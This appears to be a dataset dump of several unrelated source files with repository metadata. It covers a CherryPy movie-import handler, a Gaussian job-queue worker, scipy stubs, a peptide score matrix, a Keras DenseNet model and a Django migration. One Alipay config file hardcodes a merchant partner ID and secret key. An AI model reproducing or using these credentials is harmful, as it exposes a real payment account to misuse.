tmdb_data = self.tmdb._search_imdbid(movie['imdbid'])[0]
if not tmdb_data.get('id'):
yield json.dumps({'response': False, 'movie': movie, 'progress': [progress, length], 'reason': 'Unable to find {} on TMDB.'.format(movie['imdbid'])})
progress += 1
continue
else:
movie['id'] = tmdb_data['id']
movie['size'] = 0
movie['status'] = 'Disabled'
response = json.loads(self.add_wanted_movie(json.dumps(movie)))
if response['response'] is True:
fake_results.append(searchresults.generate_simulacrum(movie))
yield json.dumps({'response': True, 'progress': [progress, length], 'movie': movie})
progress += 1
success.append(movie)
continue
else:
yield json.dumps({'response': False, 'movie': movie, 'progress': [progress, length], 'reason': response['error']})
progress += 1
continue
fake_results = self.score.score(fake_results, imported=True)
for i in success:
score = None
for r in fake_results:
if r['imdbid'] == i['imdbid']:
score = r['score']
break
if score:
self.sql.update('MOVIES', 'finished_score', score, 'imdbid', i['imdbid'])
self.sql.write_search_results(fake_results)
import_kodi._cp_config = {'response.stream': True}
@cherrypy.expose
def get_plex_libraries(self, server, username, password):
if core.CONFIG['External']['plex_tokens'].get(server) is None:
token = library.ImportPlexLibrary.get_token(username, password)
if token is None:
return json.dumps({'response': False, 'error': 'Unable to get Plex token.'})
else:
core.CONFIG['External']['plex_tokens'][server] = token
self.config.dump(core.CONFIG)
else:
token = core.CONFIG['External']['plex_tokens'][server]
return json.dumps(library.ImportPlexLibrary.get_libraries(server, token))
@cherrypy.expose
def upload_plex_csv(self, file_input):
try:
csv_text = file_input.file.read().decode('utf-8')
file_input.file.close()
except Exception as e: #noqa
print(e)
return
if csv_text:
return json.dumps(library.ImportPlexLibrary.read_csv(csv_text))
return
@cherrypy.expose
def import_plex_csv(self, movie_data, corrected_movies):
''' Imports list of movies generated by csv import
movie_data: list of dicts of movie info ready to import
corrected_movies: list of dicts of user-corrected movie info
Iterates through corrected_movies and attempts to get metadata again if required.
If imported, generates and stores fake search result.
Creates dict {'success': [], 'failed': []} and
appends movie data to the appropriate list.
Yields generator object of json objects
'''
movie_data = json.loads(movie_data)
corrected_movies = json.loads(corrected_movies)
fake_results = []
success = []
length = len(movie_data) + len(corrected_movies)
progress = 1
if corrected_movies:
for data in corrected_movies:
tmdbdata = self.tmdb._search_imdbid(data['imdbid'])[0]
if tmdbdata:
data['year'] = tmdbdata['release_date'][:4]
data.update(tmdbdata)
movie_data.append(data)
else:
logging.error('Unable to find {} on TMDB.'.format(data['imdbid']))
yield json.dumps({'response': False, 'movie': data, 'progress': [progress, length], 'reason': 'Unable to find {} on TMDB.'.format(data['imdbid'])})
progress += 1
for movie in movie_data:
if movie['imdbid']:
movie['status'] = 'Disabled'
tmdb_data = self.tmdb._search_imdbid(movie['imdbid'])[0]
movie.update(tmdb_data)
response = json.loads(self.add_wanted_movie(json.dumps(movie)))
if response['response'] is True:
fake_results.append(searchresults.generate_simulacrum(movie))
yield json.dumps({'response': True, 'progress': [progress, length], 'movie': movie})
progress += 1
success.append(movie)
continue
else:
yield json.dumps({'response': False, 'movie': movie, 'progress': [progress, length], 'reason': response['error']})
progress += 1
continue
else:
logging.error('Unable to find {} on TMDB.'.format(movie['imdbid']))
yield json.dumps({'response': False, 'movie': movie, 'progress': [progress, length], 'reason': 'IMDB ID invalid or missing.'})
progress += 1
fake_results = self.score.score(fake_results, imported=True)
for i in success:
score = None
for r in fake_results:
if r['imdbid'] == i['imdbid']:
score = r['score']
break
if score:
self.sql.update('MOVIES', 'finished_score', score, 'imdbid', i['imdbid'])
self.sql.write_search_results(fake_results)
import_plex_csv._cp_config = {'response.stream': True}
@cherrypy.expose
def get_cp_movies(self, url, apikey):
url = '{}/api/{}/movie.list/'.format(url, apikey)
return json.dumps(library.ImportCPLibrary.get_movies(url))
@cherrypy.expose
def import_cp_movies(self, wanted, finished):
wanted = json.loads(wanted)
finished = json.loads(finished)
fake_results = []
success = []
length = len(wanted) + len(finished)
progress = 1
for movie in wanted:
response = json.loads(self.add_wanted_movie(json.dumps(movie), full_metadata=True))
if response['response'] is True:
yield json.dumps({'response': True, 'progress': [progress, length], 'movie': movie})
progress += 1
continue
else:
yield json.dumps({'response': False, 'movie': movie, 'progress': [progress, length], 'reason': response['error']})
progress += 1
continue
for movie in finished:
response = json.loads(self.add_wanted_movie(json.dumps(movie), full_metadata=True))
if response['response'] is True:
fake_results.append(searchresults.generate_simulacrum(movie))
yield json.dumps({'response': True, 'progress': [progress, length], 'movie': movie})
progress += 1
success.append(movie)
continue
else:
yield json.dumps({'response': False, 'movie': movie, 'progress': [progress, length], 'reason': response['error']})
progress += 1
continue
fake_results = self.score.score(fake_results, imported=True)
for i in success:
score = None
for r in fake_results:
if r['imdbid'] == i['imdbid']:
score = r['score']
break
if score:
self.sql.update('MOVIES', 'finished_score', score, 'imdbid', i['imdbid'])
self.sql.write_search_results(fake_results)
import_cp_movies._cp_config = {'response.stream': True}
| [
"[email protected]"
]
| |
cff553459a9e293fc45181572d58c0948c7b2fb5 | d6202e2fff0f0b22094a8bc383c3744cdcda6000 | /doc/gaussian_worker.py | 8947faa117d156fa87ff8bfc2d62fbcee2ef81ee | [
"MIT"
]
| permissive | pstjohn/bde | dc8e639527d281dade935141b06fbedc5958e4c8 | 5677af8dcbb992c7888746aa018302e6fb04e67d | refs/heads/master | 2022-07-16T02:17:59.151174 | 2022-06-30T19:52:01 | 2022-06-30T19:52:01 | 168,446,254 | 27 | 9 | MIT | 2021-09-07T16:20:45 | 2019-01-31T02:00:54 | Python | UTF-8 | Python | false | false | 2,626 | py | import psycopg2
import time
import logging
import random
import subprocess
import socket
dbparams = {
# In this example file, the database connection parameters (server, password, etc),
# has been removed. This file is mainly to show an example of how a SQL database
# was used to queue and dispatch Gaussian calculations.
}
from bde.gaussian import GaussianRunner
def run_optimization():
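# atomically claim the next unstarted compound: the CTE with FOR UPDATE locks a single row,
# so concurrent workers on other nodes never grab the same job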
with psycopg2.connect(**dbparams) as conn:
with conn.cursor() as cur:
cur.execute("""
WITH cte AS (
SELECT id, smiles, type
FROM compound
WHERE status = 'not started'
ORDER BY id
LIMIT 1
FOR UPDATE
)
UPDATE compound SET status = 'in progress',
queued_at = CURRENT_TIMESTAMP,
node = %s
FROM cte
WHERE compound.id = cte.id
RETURNING compound.id, compound.smiles, compound.type;
""", (socket.gethostname(),))
cid, smiles, type_ = cur.fetchone()
conn.close()
try:
runner = GaussianRunner(smiles, cid, type_)
molstr, enthalpy, freeenergy, scfenergy, log = runner.process()
with psycopg2.connect(**dbparams) as conn:
with conn.cursor() as cur:
cur.execute("""
UPDATE compound
SET status = 'finished',
mol = %s, enthalpy = %s,
freeenergy = %s, scfenergy= %s,
run_at = CURRENT_TIMESTAMP,
logfile = %s
WHERE id = %s;""",
(molstr, enthalpy, freeenergy, scfenergy, log, cid))
conn.close()
except Exception as ex:
with psycopg2.connect(**dbparams) as conn:
with conn.cursor() as cur:
cur.execute("""
UPDATE compound
SET status = 'error',
error = %s,
run_at = CURRENT_TIMESTAMP
WHERE id = %s;""", (str(ex), cid))
conn.close()
return cid
if __name__ == "__main__":
start_time = time.time()
# Add a random delay to avoid race conditions at the start of the job
time.sleep(random.uniform(0, 1*60))
while (time.time() - start_time) < (86400 * 9): # Time in days
try:
run_optimization()
except psycopg2.OperationalError:
time.sleep(5 + random.uniform(0, 60))
| [
"[email protected]"
]
| |
13d00496340bf494c42e637092864c02cd223882 | 8030404af9a6b2555387a49a3e43a47be7a26470 | /peggy/lib/alipaylib/alipayConfig.py | 2799153644f19ca6690396e6c9260dcb2097eff1 | []
| no_license | mebusw/tianjinsports-server | d5de7aae1a25affdd3c91c78e5a82b0d4c10220f | 3402ac634fc92b5ccdf049f530e6b7b8b604aac1 | refs/heads/master | 2016-09-06T21:32:40.096629 | 2015-03-14T13:20:24 | 2015-03-14T13:20:24 | 32,121,712 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 502 | py | import os
partner = "2088711061370024"
key = "j5f5nc0lev9wch24t2cotwdvqkwexgww"
seller_mail = "[email protected]"
if 'SERVER_SOFTWARE' in os.environ:
notify_url = "http://1.peggy.sinaapp.com/peggy/paid_notify_wap"
return_url = "http://1.peggy.sinaapp.com/peggy/paid_wap"
show_url = "http://1.peggy.sinaapp.com/peggy"
else:
notify_url = "http://127.0.0.1:8000/peggy/paid_notify_wap"
return_url = "http://127.0.0.1:8000/peggy/paid_wap"
show_url = "http://127.0.0.1:8000/peggy"
| [
"[email protected]"
]
| |
f05b968e39febf01d27debcf0bed250e13309c9a | 8898273f9811fab29eb5621734bafcdf204d8229 | /scipy-stubs/integrate/quadrature.pyi | 21ea590c9993068c72b5be57697a1ef607670d6b | []
| no_license | tyrion/scipy-stubs | 628ad6321a7e1502683a2b55a759777508ab4b67 | bf49a91313523c4f635bc3e5d14444c1361caf64 | refs/heads/master | 2020-05-30T21:59:43.001510 | 2019-06-03T10:30:54 | 2019-06-03T10:30:54 | 189,984,340 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 970 | pyi | # Stubs for scipy.integrate.quadrature (Python 3.6)
#
# NOTE: This dynamically typed stub was automatically generated by stubgen.
from numpy import trapz as trapz
from typing import Any, Optional
class AccuracyWarning(Warning): ...
def fixed_quad(func: Any, a: Any, b: Any, args: Any = ..., n: int = ...): ...
def quadrature(func: Any, a: Any, b: Any, args: Any = ..., tol: float = ..., rtol: float = ..., maxiter: int = ..., vec_func: bool = ..., miniter: int = ...): ...
def cumtrapz(y: Any, x: Optional[Any] = ..., dx: float = ..., axis: int = ..., initial: Optional[Any] = ...): ...
def simps(y: Any, x: Optional[Any] = ..., dx: int = ..., axis: int = ..., even: str = ...): ...
def romb(y: Any, dx: float = ..., axis: int = ..., show: bool = ...): ...
def romberg(function: Any, a: Any, b: Any, args: Any = ..., tol: float = ..., rtol: float = ..., show: bool = ..., divmax: int = ..., vec_func: bool = ...): ...
def newton_cotes(rn: Any, equal: int = ...): ...
| [
"[email protected]"
]
| |
188b926a0273d9407218185aa3016d3f02c1eb88 | 55b57d64ec547869835334318f3059fbb507558c | /Fred2/Data/pssms/smm/mat/A_32_07_9.py | 9d57732d1c3384a786473ec66600efe950cc1551 | [
"BSD-3-Clause"
]
| permissive | FRED-2/Fred2 | 9845f6678d4011cb746c7a5a6f283eea68077a02 | b3e54c8c4ed12b780b61f74672e9667245a7bb78 | refs/heads/master | 2021-07-12T05:05:54.515427 | 2020-05-25T06:56:25 | 2020-05-25T06:56:25 | 16,275,425 | 42 | 35 | null | 2021-07-07T12:05:11 | 2014-01-27T10:08:11 | Python | UTF-8 | Python | false | false | 2,145 | py | A_32_07_9 = {0: {'A': 0.197, 'C': 0.0, 'E': -0.11, 'D': 0.0, 'G': -0.053, 'F': 0.087, 'I': 0.122, 'H': -0.115, 'K': -0.109, 'M': 0.153, 'L': 0.056, 'N': 0.0, 'Q': -0.004, 'P': 0.0, 'S': -0.278, 'R': -0.213, 'T': -0.08, 'W': 0.169, 'V': 0.0, 'Y': 0.177}, 1: {'A': 0.177, 'C': 0.0, 'E': 0.245, 'D': 0.0, 'G': -0.006, 'F': -0.133, 'I': -0.025, 'H': 0.0, 'K': 0.0, 'M': 0.031, 'L': -0.032, 'N': 0.0, 'Q': -0.236, 'P': 0.039, 'S': -0.022, 'R': 0.167, 'T': 0.083, 'W': 0.0, 'V': -0.011, 'Y': -0.276}, 2: {'A': 0.158, 'C': 0.0, 'E': 0.0, 'D': 0.0, 'G': 0.0, 'F': -0.04, 'I': 0.081, 'H': -0.15, 'K': 0.058, 'M': -0.145, 'L': -0.108, 'N': 0.001, 'Q': 0.0, 'P': 0.021, 'S': -0.15, 'R': 0.038, 'T': -0.136, 'W': 0.24, 'V': 0.098, 'Y': 0.032}, 3: {'A': 0.0, 'C': 0.0, 'E': -0.001, 'D': -0.0, 'G': -0.0, 'F': -0.0, 'I': 0.0, 'H': -0.0, 'K': 0.0, 'M': -0.0, 'L': 0.0, 'N': -0.0, 'Q': -0.0, 'P': -0.001, 'S': 0.0, 'R': 0.0, 'T': 0.001, 'W': -0.0, 'V': 0.0, 'Y': -0.0}, 4: {'A': 0.002, 'C': 0.0, 'E': -0.0, 'D': 0.0, 'G': -0.002, 'F': 0.001, 'I': -0.001, 'H': -0.001, 'K': 0.0, 'M': -0.001, 'L': 0.001, 'N': -0.0, 'Q': -0.0, 'P': 0.001, 'S': 0.001, 'R': 0.001, 'T': -0.001, 'W': -0.001, 'V': 0.0, 'Y': -0.001}, 5: {'A': 0.059, 'C': -0.077, 'E': 0.0, 'D': -0.06, 'G': -0.123, 'F': 0.09, 'I': 0.075, 'H': 0.317, 'K': -0.107, 'M': 0.0, 'L': 0.071, 'N': -0.058, 'Q': -0.079, 'P': 0.019, 'S': -0.002, 'R': 0.086, 'T': -0.012, 'W': -0.165, 'V': -0.036, 'Y': 0.002}, 6: {'A': 0.0, 'C': 0.0, 'E': 0.0, 'D': 0.0, 'G': 0.0, 'F': -0.0, 'I': 0.0, 'H': 0.0, 'K': 0.0, 'M': 0.0, 'L': -0.0, 'N': -0.0, 'Q': -0.0, 'P': -0.0, 'S': -0.0, 'R': 0.0, 'T': 0.0, 'W': -0.0, 'V': -0.0, 'Y': -0.0}, 7: {'A': 0.133, 'C': 0.0, 'E': 0.109, 'D': 0.0, 'G': -0.133, 'F': 0.002, 'I': 0.0, 'H': -0.0, 'K': 0.032, 'M': 0.12, 'L': -0.108, 'N': 0.015, 'Q': -0.064, 'P': 0.036, 'S': -0.019, 'R': 0.0, 'T': -0.186, 'W': 0.0, 'V': -0.006, 'Y': 0.071}, 8: {'A': 0.0, 'C': 0.0, 'E': 0.0, 'D': 0.0, 'G': 0.0, 'F': -0.01, 'I': -0.01, 'H': 0.0, 'K': 0.021, 'M': -0.006, 'L': 0.036, 'N': 0.0, 'Q': 0.0, 'P': 0.0, 'S': 0.0, 'R': 0.008, 'T': 0.0, 'W': -0.032, 'V': -0.001, 'Y': -0.005}, -1: {'con': 1.37905}} | [
"[email protected]"
]
| |
b32a67ea872da39fa07c33669690cc804b81d4ba | 5c80c1c3a24399db5d7c2a259a3e2d18dcbe79a2 | /TensorFlow/computer_vision/densenet_keras/models/densenet.py | 0b3007fe678d074e264f54166cd76a0aededbb19 | [
"MIT",
"Apache-2.0"
]
| permissive | maxchung2001/Model-References | b2f26cec3bcfc912f50379e47fcff7cb60ea96d2 | bc8da16830c1c35e5d1458ba2e46df8726e10f29 | refs/heads/master | 2023-04-12T16:37:27.103316 | 2021-04-22T07:00:01 | 2021-04-22T07:00:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 16,199 | py | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=invalid-name
"""DenseNet models for Keras.
Reference paper:
- [Densely Connected Convolutional Networks]
(https://arxiv.org/abs/1608.06993) (CVPR 2017 Best Paper Award)
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
from tensorflow.python.keras import backend
from tensorflow.python.keras import layers
from tensorflow.python.keras.applications import imagenet_utils
from tensorflow.python.keras.engine import training
from tensorflow.python.keras.utils import data_utils
from tensorflow.python.keras.utils import layer_utils
from tensorflow.python.util.tf_export import keras_export
BASE_WEIGTHS_PATH = ('https://storage.googleapis.com/tensorflow/'
'keras-applications/densenet/')
DENSENET121_WEIGHT_PATH = (
BASE_WEIGTHS_PATH + 'densenet121_weights_tf_dim_ordering_tf_kernels.h5')
DENSENET121_WEIGHT_PATH_NO_TOP = (
BASE_WEIGTHS_PATH +
'densenet121_weights_tf_dim_ordering_tf_kernels_notop.h5')
DENSENET169_WEIGHT_PATH = (
BASE_WEIGTHS_PATH + 'densenet169_weights_tf_dim_ordering_tf_kernels.h5')
DENSENET169_WEIGHT_PATH_NO_TOP = (
BASE_WEIGTHS_PATH +
'densenet169_weights_tf_dim_ordering_tf_kernels_notop.h5')
DENSENET201_WEIGHT_PATH = (
BASE_WEIGTHS_PATH + 'densenet201_weights_tf_dim_ordering_tf_kernels.h5')
DENSENET201_WEIGHT_PATH_NO_TOP = (
BASE_WEIGTHS_PATH +
'densenet201_weights_tf_dim_ordering_tf_kernels_notop.h5')
def dense_block(x, blocks, name):
"""A dense block.
Arguments:
x: input tensor.
blocks: integer, the number of building blocks.
name: string, block label.
Returns:
Output tensor for the block.
"""
for i in range(blocks):
x = conv_block(x, 32, name=name + '_block' + str(i + 1))
return x
def transition_block(x, reduction, name):
"""A transition block.
Arguments:
x: input tensor.
reduction: float, compression rate at transition layers.
name: string, block label.
Returns:
output tensor for the block.
"""
bn_axis = 3 if backend.image_data_format() == 'channels_last' else 1
x = layers.BatchNormalization(
axis=bn_axis, epsilon=1.001e-5, name=name + '_bn')(
x)
x = layers.Activation('relu', name=name + '_relu')(x)
x = layers.Conv2D(
int(backend.int_shape(x)[bn_axis] * reduction),
1,
use_bias=False,
name=name + '_conv')(
x)
x = layers.AveragePooling2D(2, strides=2, name=name + '_pool')(x)
return x
def conv_block(x, growth_rate, name):
"""A building block for a dense block.
Arguments:
x: input tensor.
growth_rate: float, growth rate at dense layers.
name: string, block label.
Returns:
Output tensor for the block.
"""
bn_axis = 3 if backend.image_data_format() == 'channels_last' else 1
x1 = layers.BatchNormalization(
axis=bn_axis, epsilon=1.001e-5, name=name + '_0_bn')(
x)
x1 = layers.Activation('relu', name=name + '_0_relu')(x1)
x1 = layers.Conv2D(
4 * growth_rate, 1, use_bias=False, name=name + '_1_conv')(
x1)
x1 = layers.BatchNormalization(
axis=bn_axis, epsilon=1.001e-5, name=name + '_1_bn')(
x1)
x1 = layers.Activation('relu', name=name + '_1_relu')(x1)
x1 = layers.Conv2D(
growth_rate, 3, padding='same', use_bias=False, name=name + '_2_conv')(
x1)
x = layers.Concatenate(axis=bn_axis, name=name + '_concat')([x, x1])
return x
def DenseNet(
batch_size,
blocks,
include_top=True,
weights='imagenet',
input_tensor=None,
input_shape=None,
pooling=None,
classes=1000,
classifier_activation='softmax',
):
"""Instantiates the DenseNet architecture.
Optionally loads weights pre-trained on ImageNet.
Note that the data format convention used by the model is
the one specified in your Keras config at `~/.keras/keras.json`.
Caution: Be sure to properly pre-process your inputs to the application.
Please see `applications.densenet.preprocess_input` for an example.
Arguments:
blocks: numbers of building blocks for the four dense layers.
include_top: whether to include the fully-connected
layer at the top of the network.
weights: one of `None` (random initialization),
'imagenet' (pre-training on ImageNet),
or the path to the weights file to be loaded.
input_tensor: optional Keras tensor
(i.e. output of `layers.Input()`)
to use as image input for the model.
input_shape: optional shape tuple, only to be specified
if `include_top` is False (otherwise the input shape
has to be `(224, 224, 3)` (with `'channels_last'` data format)
or `(3, 224, 224)` (with `'channels_first'` data format).
It should have exactly 3 inputs channels,
and width and height should be no smaller than 32.
E.g. `(200, 200, 3)` would be one valid value.
pooling: optional pooling mode for feature extraction
when `include_top` is `False`.
- `None` means that the output of the model will be
the 4D tensor output of the
last convolutional block.
- `avg` means that global average pooling
will be applied to the output of the
last convolutional block, and thus
the output of the model will be a 2D tensor.
- `max` means that global max pooling will
be applied.
classes: optional number of classes to classify images
into, only to be specified if `include_top` is True, and
if no `weights` argument is specified.
classifier_activation: A `str` or callable. The activation function to use
on the "top" layer. Ignored unless `include_top=True`. Set
`classifier_activation=None` to return the logits of the "top" layer.
Returns:
A `keras.Model` instance.
Raises:
ValueError: in case of invalid argument for `weights`,
or invalid input shape.
ValueError: if `classifier_activation` is not `softmax` or `None` when
using a pretrained top layer.
"""
if not (weights in {'imagenet', None} or os.path.exists(weights)):
raise ValueError('The `weights` argument should be either '
'`None` (random initialization), `imagenet` '
'(pre-training on ImageNet), '
'or the path to the weights file to be loaded.')
if weights == 'imagenet' and include_top and classes != 1000:
raise ValueError('If using `weights` as `"imagenet"` with `include_top`'
' as true, `classes` should be 1000')
# Determine proper input shape
input_shape = imagenet_utils.obtain_input_shape(
input_shape,
default_size=224,
min_size=32,
data_format=backend.image_data_format(),
require_flatten=include_top,
weights=weights)
if input_tensor is None:
img_input = layers.Input(shape=input_shape, batch_size=batch_size)
else:
if not backend.is_keras_tensor(input_tensor):
img_input = layers.Input(tensor=input_tensor, shape=input_shape, batch_size=batch_size)
else:
img_input = input_tensor
    raise NotImplementedError("Unsupported flow")
bn_axis = 3 if backend.image_data_format() == 'channels_last' else 1
x = layers.ZeroPadding2D(padding=((3, 3), (3, 3)))(img_input)
x = layers.Conv2D(64, 7, strides=2, use_bias=False, name='conv1/conv')(x)
x = layers.BatchNormalization(
axis=bn_axis, epsilon=1.001e-5, name='conv1/bn')(
x)
x = layers.Activation('relu', name='conv1/relu')(x)
x = layers.ZeroPadding2D(padding=((1, 1), (1, 1)))(x)
x = layers.MaxPooling2D(3, strides=2, name='pool1')(x)
x = dense_block(x, blocks[0], name='conv2')
x = transition_block(x, 0.5, name='pool2')
x = dense_block(x, blocks[1], name='conv3')
x = transition_block(x, 0.5, name='pool3')
x = dense_block(x, blocks[2], name='conv4')
x = transition_block(x, 0.5, name='pool4')
x = dense_block(x, blocks[3], name='conv5')
x = layers.BatchNormalization(axis=bn_axis, epsilon=1.001e-5, name='bn')(x)
x = layers.Activation('relu', name='relu')(x)
if include_top:
x = layers.GlobalAveragePooling2D(name='avg_pool')(x)
imagenet_utils.validate_activation(classifier_activation, weights)
x = layers.Dense(classes, activation=classifier_activation,
name='predictions')(x)
else:
if pooling == 'avg':
x = layers.GlobalAveragePooling2D(name='avg_pool')(x)
elif pooling == 'max':
x = layers.GlobalMaxPooling2D(name='max_pool')(x)
# Ensure that the model takes into account
# any potential predecessors of `input_tensor`.
if input_tensor is not None:
inputs = layer_utils.get_source_inputs(input_tensor)
else:
inputs = img_input
# Create model.
if blocks == [6, 12, 24, 16]:
model = training.Model(inputs, x, name='densenet121')
elif blocks == [6, 12, 32, 32]:
model = training.Model(inputs, x, name='densenet169')
elif blocks == [6, 12, 48, 32]:
model = training.Model(inputs, x, name='densenet201')
else:
model = training.Model(inputs, x, name='densenet')
# Load weights.
if weights == 'imagenet':
if include_top:
if blocks == [6, 12, 24, 16]:
weights_path = data_utils.get_file(
'densenet121_weights_tf_dim_ordering_tf_kernels.h5',
DENSENET121_WEIGHT_PATH,
cache_subdir='models',
file_hash='9d60b8095a5708f2dcce2bca79d332c7')
elif blocks == [6, 12, 32, 32]:
weights_path = data_utils.get_file(
'densenet169_weights_tf_dim_ordering_tf_kernels.h5',
DENSENET169_WEIGHT_PATH,
cache_subdir='models',
file_hash='d699b8f76981ab1b30698df4c175e90b')
elif blocks == [6, 12, 48, 32]:
weights_path = data_utils.get_file(
'densenet201_weights_tf_dim_ordering_tf_kernels.h5',
DENSENET201_WEIGHT_PATH,
cache_subdir='models',
file_hash='1ceb130c1ea1b78c3bf6114dbdfd8807')
else:
if blocks == [6, 12, 24, 16]:
weights_path = data_utils.get_file(
'densenet121_weights_tf_dim_ordering_tf_kernels_notop.h5',
DENSENET121_WEIGHT_PATH_NO_TOP,
cache_subdir='models',
file_hash='30ee3e1110167f948a6b9946edeeb738')
elif blocks == [6, 12, 32, 32]:
weights_path = data_utils.get_file(
'densenet169_weights_tf_dim_ordering_tf_kernels_notop.h5',
DENSENET169_WEIGHT_PATH_NO_TOP,
cache_subdir='models',
file_hash='b8c4d4c20dd625c148057b9ff1c1176b')
elif blocks == [6, 12, 48, 32]:
weights_path = data_utils.get_file(
'densenet201_weights_tf_dim_ordering_tf_kernels_notop.h5',
DENSENET201_WEIGHT_PATH_NO_TOP,
cache_subdir='models',
file_hash='c13680b51ded0fb44dff2d8f86ac8bb1')
model.load_weights(weights_path)
elif weights is not None:
model.load_weights(weights)
return model
@keras_export('keras.applications.densenet.DenseNet121',
'keras.applications.DenseNet121')
def DenseNet121(include_top=True,
weights='imagenet',
input_tensor=None,
input_shape=None,
pooling=None,
classes=1000):
"""Instantiates the Densenet121 architecture."""
return DenseNet([6, 12, 24, 16], include_top, weights, input_tensor,
input_shape, pooling, classes)
@keras_export('keras.applications.densenet.DenseNet169',
'keras.applications.DenseNet169')
def DenseNet169(include_top=True,
weights='imagenet',
input_tensor=None,
input_shape=None,
pooling=None,
classes=1000):
"""Instantiates the Densenet169 architecture."""
return DenseNet([6, 12, 32, 32], include_top, weights, input_tensor,
input_shape, pooling, classes)
@keras_export('keras.applications.densenet.DenseNet201',
'keras.applications.DenseNet201')
def DenseNet201(include_top=True,
weights='imagenet',
input_tensor=None,
input_shape=None,
pooling=None,
classes=1000):
"""Instantiates the Densenet201 architecture."""
return DenseNet([6, 12, 48, 32], include_top, weights, input_tensor,
input_shape, pooling, classes)
@keras_export('keras.applications.densenet.preprocess_input')
def preprocess_input(x, data_format=None):
"""Preprocesses a numpy array encoding a batch of images.
Arguments
x: A 4D numpy array consists of RGB values within [0, 255].
Returns
Preprocessed array.
Raises
ValueError: In case of unknown `data_format` argument.
"""
return imagenet_utils.preprocess_input(
x, data_format=data_format, mode='torch')
@keras_export('keras.applications.densenet.decode_predictions')
def decode_predictions(preds, top=5):
"""Decodes the prediction result from the model.
Arguments
preds: Numpy tensor encoding a batch of predictions.
top: Integer, how many top-guesses to return.
Returns
A list of lists of top class prediction tuples
`(class_name, class_description, score)`.
One list of tuples per sample in batch input.
Raises
ValueError: In case of invalid shape of the `preds` array (must be 2D).
"""
return imagenet_utils.decode_predictions(preds, top=top)
preprocess_input.__doc__ = imagenet_utils.PREPROCESS_INPUT_DOC.format(
mode='', ret=imagenet_utils.PREPROCESS_INPUT_RET_DOC_TORCH)
decode_predictions.__doc__ = imagenet_utils.decode_predictions.__doc__
DOC = """
Optionally loads weights pre-trained on ImageNet.
Note that the data format convention used by the model is
the one specified in your Keras config at `~/.keras/keras.json`.
Arguments:
include_top: whether to include the fully-connected
layer at the top of the network.
weights: one of `None` (random initialization),
'imagenet' (pre-training on ImageNet),
or the path to the weights file to be loaded.
input_tensor: optional Keras tensor (i.e. output of `layers.Input()`)
to use as image input for the model.
input_shape: optional shape tuple, only to be specified
if `include_top` is False (otherwise the input shape
has to be `(224, 224, 3)` (with `'channels_last'` data format)
or `(3, 224, 224)` (with `'channels_first'` data format).
It should have exactly 3 inputs channels,
and width and height should be no smaller than 32.
E.g. `(200, 200, 3)` would be one valid value.
pooling: Optional pooling mode for feature extraction
when `include_top` is `False`.
- `None` means that the output of the model will be
the 4D tensor output of the
last convolutional block.
- `avg` means that global average pooling
will be applied to the output of the
last convolutional block, and thus
the output of the model will be a 2D tensor.
- `max` means that global max pooling will
be applied.
classes: optional number of classes to classify images
into, only to be specified if `include_top` is True, and
if no `weights` argument is specified.
Returns:
A Keras model instance.
"""
setattr(DenseNet121, '__doc__', DenseNet121.__doc__ + DOC)
setattr(DenseNet169, '__doc__', DenseNet169.__doc__ + DOC)
setattr(DenseNet201, '__doc__', DenseNet201.__doc__ + DOC)
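# Illustrative example: in this variant the DenseNet builder takes the batch size
# as its first positional argument, e.g.
#   model = DenseNet(batch_size=32, blocks=[6, 12, 24, 16], weights=None, classes=10)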
| [
"[email protected]"
]
| |
eae6d7708433536367bc9b2cb96ce49711facb5d | 2ebc85f7f34a459d69ff412f956b43ab2472590f | /backend/tasker_business/migrations/0001_initial.py | 95053422e99e4ae9ece3cd837ff4b1db4b389baf | []
| no_license | crowdbotics-apps/mobile-car-wash-23107 | 4ea678f1c88fe4c96eb498535e4fb14e60110ae0 | 96b057e5989a8b5dbb1267f93c0a34f57a72d636 | refs/heads/master | 2023-01-19T21:07:11.993601 | 2020-12-01T12:55:21 | 2020-12-01T12:55:21 | 317,537,397 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,617 | py | # Generated by Django 2.2.17 on 2020-12-01 12:53
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('task_category', '0001_initial'),
('task_profile', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Timeslot',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date', models.DateField()),
('start_time', models.TimeField()),
('end_time', models.TimeField()),
],
),
migrations.CreateModel(
name='TaskerSkill',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('rate', models.FloatField()),
('description', models.TextField()),
('category', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='taskerskill_category', to='task_category.Category')),
('subcategory', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='taskerskill_subcategory', to='task_category.Subcategory')),
('tasker', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='taskerskill_tasker', to='task_profile.TaskerProfile')),
],
),
migrations.CreateModel(
name='TaskerAvailability',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('tasker', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='taskeravailability_tasker', to='task_profile.TaskerProfile')),
('timeslots', models.ManyToManyField(related_name='taskeravailability_timeslots', to='tasker_business.Timeslot')),
],
),
migrations.CreateModel(
name='BusinessPhoto',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('photo', models.URLField()),
('description', models.TextField()),
('tasker', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='businessphoto_tasker', to='task_profile.TaskerProfile')),
],
),
]
| [
"[email protected]"
]
| |
